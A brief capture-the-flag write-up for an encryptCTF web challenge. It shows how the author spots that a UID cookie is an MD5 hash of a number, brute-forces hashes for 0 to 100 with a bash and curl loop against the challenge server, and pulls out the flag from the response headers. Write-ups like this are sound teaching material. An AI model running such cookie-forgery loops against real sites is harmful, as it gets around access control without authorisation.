Tags: web 

Rating: 0

Checking the cookies for the challenge we can see there are two of them

FLAG=encryptCTF{y0u_c4nt_U53_m3}

UID=f899139df5e1059396431415e770c6dd

The UID looks like an md5 hash so decoding that we get 100 so UID=100 and that gives us the FLAG cookie we can't use. So curl and bash to the rescue

`for i in {0..100}; do echo -n $i | md5sum | sed -e "s/ -//"; done > 0-100.md5`

this gives us md5 sums or 0-100 without the trailing -

Once we have the md5 sums we fire them off to curl and dump only the headers and pipe it to grep for encryptctf

`while read line; do curl -sSL --cookie "UID=$line" -D - http://104.154.106.182:8080/; done < 0-100.md5 | grep -i encrypt`

Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A

Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D

Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D

Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D

with headers

HTTP/1.1 200 OK

Date: Thu, 04 Apr 2019 11:27:26 GMT

Server: Apache/2.4.25 (Debian)

X-Powered-By: PHP/7.3.3

Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A

Vary: Accept-Encoding

Content-Length: 353

Content-Type: text/html; charset=UTF-8

`FLAG: encryptCTF{4lwa4y5_Ch3ck_7h3_c00ki3s}`